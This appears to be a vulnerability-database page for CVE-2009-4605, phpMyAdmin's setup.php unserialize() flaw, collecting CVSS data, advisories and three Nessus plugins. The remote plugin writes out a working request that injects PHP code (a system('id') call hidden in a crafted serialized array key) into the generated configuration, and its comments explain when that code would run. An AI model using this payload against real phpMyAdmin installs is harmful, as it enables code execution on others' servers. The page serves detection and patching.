Vulnerabilities > CVE-2009-4605 - phpMyAdmin 2.11.x scripts/setup.php calls unserialize() on untrusted POST data (PHP code injection into the generated configuration file; vendor advisory PMASA-2010-3)
CVSS v2 as listed on this page: AV:N/AC:L/Au:N/C:N/I:P/A:N
Attack vector: NETWORK
Attack complexity: LOW
Privileges required (authentication): NONE
Confidentiality impact: NONE
Integrity impact: PARTIAL
Availability impact: NONE
Note: the scanner checks below rate the same issue higher - the Nessus remote check uses AV:N/AC:L/Au:N/C:P/I:P/A:P and the openSUSE/Debian package checks use C:C/I:C/A:C - because the practical outcome is PHP code injection into the configuration file that setup.php generates, i.e. code execution as the web server user wherever that file can be written and is later loaded.
Summary
scripts/setup.php (aka the setup script) in phpMyAdmin 2.11.x before 2.11.10 calls the unserialize function on the values of the (1) configuration and (2) v[0] parameters, which might allow remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors. Practical preconditions, as exercised by the Nessus remote check below: the setup script must still be deployed and reachable over HTTP (it is served without authentication, and its anti-CSRF token is handed out by a plain GET), and the injected PHP only becomes persistent if the web server can write the configuration file to disk - the check reports a non-writeable configuration directory as "cannot be exploited at this time". Removing or blocking access to the scripts/ directory after initial setup and upgrading to 2.11.10 or later both close this.
Vulnerable Configurations
Nessus
NASL family CGI abuses NASL id PHPMYADMIN_PMASA_2010_3.NASL description The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection. A remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server. last seen 2020-06-01 modified 2020-06-02 plugin id 44324 published 2010-01-27 reporter This script is Copyright (C) 2010-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/44324 title phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3) code
#
# (C) Tenable Network Security, Inc.
#
# Remote check for PMASA-2010-3 / CVE-2009-4605: phpMyAdmin 2.11.x before
# 2.11.10 hands the POSTed "configuration" parameter of scripts/setup.php to
# unserialize(). This plugin proves injection by asking setup.php to render
# ("download") a configuration built from attacker-controlled array keys and
# then looking for its own unique marker in the response body. It never asks
# setup.php to save the configuration, so the check itself is non-destructive.
#
# NOTE(review): the advisory frames the issue as CSRF; from this plugin's
# point of view the important precondition is simply that setup.php is still
# deployed and reachable, since everything it needs (including the token) is
# obtained from an unauthenticated GET.
#

include("compat.inc");

if (description)
{
  script_id(44324);
  script_version("1.10");
  script_cvs_date("Date: 2018/11/15 20:50:18");

  script_cve_id("CVE-2009-4605");
  script_bugtraq_id(37861);
  script_xref(name:"Secunia", value:"38211");

  script_name(english:"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)");
  script_summary(english:"Checks if code can be injected into the config file");

  script_set_attribute( attribute:"synopsis", value: "The remote web server contains a PHP application that may allow execution of arbitrary code." );
  script_set_attribute( attribute:"description", value: "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection. A remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.phpmyadmin.net/security/PMASA-2010-3/");
  script_set_attribute(attribute:"solution", value:"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.");
  # Rated partial C/I/A here; the distribution package checks for the same
  # CVE use C:C/I:C/A:C and NVD lists I:P only - the vector is a judgement
  # call, the finding is the same.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/15");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/01/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
  script_end_attributes();

  # ACT_GATHER_INFO: the plugin only sends a request whose payload is
  # reflected back; nothing is written on the target.
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.");

  script_dependencies("phpMyAdmin_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/phpMyAdmin", "www/PHP");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");

port = get_http_port(default:80, php:TRUE);

install = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);

# The first request makes sure the page exists, the PMA config is writeable,
# and extracts the token
# (exit_on_fail: an install whose scripts/setup.php is gone or blocked is not
# reported - that is the expected post-setup hardening, not a false negative).
url = install['dir']+'/scripts/setup.php';
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);

# If the config can't be written to disk, this cannot be exploited - even
# if the software is unpatched. In which case, only continue if paranoid.
if ('Can not load or save configuration' >< res[2])
{
  if (report_paranoia < 2)
    exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');
  else config_writeable = FALSE;
}
else config_writeable = TRUE;

# Extract the token.
# The anti-CSRF token comes from the unauthenticated GET above, so it only
# defends against a browser-forged cross-site POST; anyone who can reach
# setup.php directly obtains it exactly as this plugin does.
token = NULL;
pat = 'input type="hidden" name="token" value="([^"]+)"';
match = eregmatch(string:res[2], pattern:pat);
if (match) token = match[1];
else exit(1, "Unable to extract token from "+build_url(qs:url, port:port));

# The second request determines if PHP code can be injected into the config file
# The marker is a PHP array key that closes the single-quoted key early
# ("']") and appends a statement. unixtime() makes it unique per scan so a
# cached or stale page cannot produce a false positive. The system() call is
# reflected text only - this plugin never relies on it being executed.
cmd = 'id';
array_name = "TNS";
inj_code = SCRIPT_NAME+"'] = "+unixtime()+"; system('"+cmd+"'); //";
expected_out = "$cfg['Servers'][$i]['"+array_name+"']['" + inj_code;

# Hand-built PHP serialized value: Servers[0][TNS][<inj_code>] = "".
# The s:<len> prefixes must be byte lengths (what unserialize() counts).
config=
  'a:1:{'+
    's:7:"Servers";'+
    'a:1:{'+
      'i:0;'+
      'a:1:{'+
        's:'+strlen(array_name)+':"'+array_name+'";'+
        'a:1:{'+
          's:'+strlen(inj_code)+':"'+inj_code+'";'+
          's:0:"";'+
        '}'+
      '}'+
    '}'+
  '}';

# action=download only renders the generated config in the response body;
# the plugin's own report text below treats "cannot write the configuration
# file to disk" as "cannot be exploited", i.e. persisting the file is the
# step that turns reflected text into executed PHP.
postdata =
  'token='+token+'&'+
  'action=download&'+
  'configuration='+urlencode(str:config);
res = http_send_recv3(
  method:"POST",
  item:url,
  port:port,
  data:postdata,
  content_type:"application/x-www-form-urlencoded",
  exit_on_fail:TRUE
);

# Reflection of the marker proves the unserialized key reached the config
# generator unsanitized; only then decide how to word the finding.
if (expected_out >< res[2])
{
  if (!config_writeable)
  {
    report =
      '\nEven though the software is unpatched, the web server does not\n'+
      'have permission to write the configuration file to disk, which\n'+
      'means the vulnerability cannot be exploited at this time.\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else
{
  full_url = build_url(qs:install['dir']+'/', port:port);
  exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');
}
NASL family SuSE Local Security Checks NASL id SUSE_11_0_PHPMYADMIN-091209.NASL description The use of unserialize() on POST data which could have lead to remote code execution (CVE-2009-4605) has been fixed as well as some minor temporary file issues (CVE-2008-7251, CVE-2008-7252). last seen 2020-06-01 modified 2020-06-02 plugin id 44044 published 2010-01-18 reporter This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/44044 title openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801) code
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update phpMyAdmin-1801.
#
# The text description of this plugin is (C) SUSE LLC.
#
# Local (SSH / rpm-list) check: flags an openSUSE 11.0 host whose installed
# phpMyAdmin rpm is older than the one shipped in update phpMyAdmin-1801.
# Unlike the remote setup.php check, this is a pure version comparison and
# says nothing about whether setup.php is reachable or the config directory
# is writeable on the host.

include("compat.inc");

if (description)
{
  script_id(44044);
  script_version("1.11");
  script_cvs_date("Date: 2019/10/25 13:36:34");

  script_cve_id("CVE-2008-7251", "CVE-2008-7252", "CVE-2009-4605");

  script_name(english:"openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)");
  script_summary(english:"Check for the phpMyAdmin-1801 patch");

  script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." );
  script_set_attribute( attribute:"description", value: "The use of unserialize() on POST data which could have lead to remote code execution (CVE-2009-4605) has been fixed as well as some minor temporary file issues (CVE-2008-7251, CVE-2008-7252)." );
  script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=559569" );
  script_set_attribute( attribute:"solution", value:"Update the affected phpMyAdmin package."
  );
  # Vendor-update rating; the vector covers all three CVEs in the update.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:phpMyAdmin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2009/12/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/18");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

# Preconditions: local checks ran and produced an openSUSE 11.0 rpm list.
# SLED/SLES carry their own update stream and are excluded explicitly.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

os_release = get_kb_item("Host/SuSE/release");
if (isnull(os_release) || os_release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (os_release !~ "^(SUSE11\.0)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.0", os_release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Anything below the fixed build phpMyAdmin-2.11.9.6-0.3 is affected.
vulnerable = rpm_check(release:"SUSE11.0", reference:"phpMyAdmin-2.11.9.6-0.3");

if (vulnerable)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}

# Not vulnerable: tell "fixed version present" apart from "not installed".
checked = pkg_tests_get();
if (checked) audit(AUDIT_PACKAGE_NOT_AFFECTED, checked);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "phpMyAdmin");
NASL family Debian Local Security Checks NASL id DEBIAN_DSA-2034.NASL description Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-7251 phpMyAdmin may create a temporary directory, if the configured directory does not exist yet, with insecure filesystem permissions. - CVE-2008-7252 phpMyAdmin uses predictable filenames for temporary files, which may lead to a local denial of service attack or privilege escalation. - CVE-2009-4605 The setup.php script shipped with phpMyAdmin may unserialize untrusted data, allowing for cross site request forgery. last seen 2020-06-01 modified 2020-06-02 plugin id 45556 published 2010-04-19 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/45556 title Debian DSA-2034-1 : phpmyadmin - several vulnerabilities code
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-2034. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
# Local (SSH / dpkg -l) check: flags a Debian 5.0 (lenny) host whose
# phpmyadmin package is older than 2.11.8.1-5+lenny4, the DSA-2034 fix.
# Pure version comparison - it does not test whether setup.php is exposed.

include("compat.inc");

if (description)
{
  script_id(45556);
  script_version("1.12");
  script_cvs_date("Date: 2019/08/02 13:32:22");

  script_cve_id("CVE-2008-7251", "CVE-2008-7252", "CVE-2009-4605");
  script_bugtraq_id(37826);
  script_xref(name:"DSA", value:"2034");

  script_name(english:"Debian DSA-2034-1 : phpmyadmin - several vulnerabilities");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." );
  script_set_attribute( attribute:"description", value: "Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. 
The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2008-7251 phpMyAdmin may create a temporary directory, if the configured directory does not exist yet, with insecure filesystem permissions. - CVE-2008-7252 phpMyAdmin uses predictable filenames for temporary files, which may lead to a local denial of service attack or privilege escalation. - CVE-2009-4605 The setup.php script shipped with phpMyAdmin may unserialize untrusted data, allowing for cross site request forgery." );
  script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2008-7251" );
  script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2008-7252" );
  script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2009-4605" );
  script_set_attribute( attribute:"see_also", value:"https://www.debian.org/security/2010/dsa-2034" );
  script_set_attribute( attribute:"solution", value: "Upgrade the phpmyadmin package. For the stable distribution (lenny), these problems have been fixed in version phpmyadmin 2.11.8.1-5+lenny4."
  );
  # DSA rating covering all three CVEs in the advisory.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:phpmyadmin");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:5.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2010/04/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/04/19");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}

include("audit.inc");
include("debian_package.inc");

# Preconditions: local checks ran on a Debian host and a dpkg list exists.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Affected if the installed phpmyadmin is below the lenny fix version.
affected = deb_check(release:"5.0", prefix:"phpmyadmin", reference:"2.11.8.1-5+lenny4");

if (affected)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}

audit(AUDIT_HOST_NOT, "affected");
Seebug
bulletinFamily | exploit |
description | BUGTRAQ ID: 37861 CVE(CAN) ID: CVE-2009-4605 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin使用了传送给scripts/setup.php脚本的configuration和v[0]输入参数来调用unserialize函数,远程攻击者可以通过提交恶意请求执行跨站请求伪造攻击,以其他用户的权限执行任意指令。 phpMyAdmin 2.11.x 厂商补丁: phpMyAdmin ---------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.phpmyadmin.net/ |
id | SSV:18972 |
last seen | 2017-11-19 |
modified | 2010-01-21 |
published | 2010-01-21 |
reporter | Root |
title | phpMyAdmin unserialize()调用跨站请求伪造漏洞 |
References
- http://lists.opensuse.org/opensuse-security-announce/2010-01/msg00007.html
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/QA_2_11/phpMyAdmin/scripts/setup.php?r1=13149&r2=13148&pathrev=13149
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=13149
- http://secunia.com/advisories/38211
- http://secunia.com/advisories/39503
- http://www.debian.org/security/2010/dsa-2034
- http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php
- http://www.vupen.com/english/advisories/2010/0910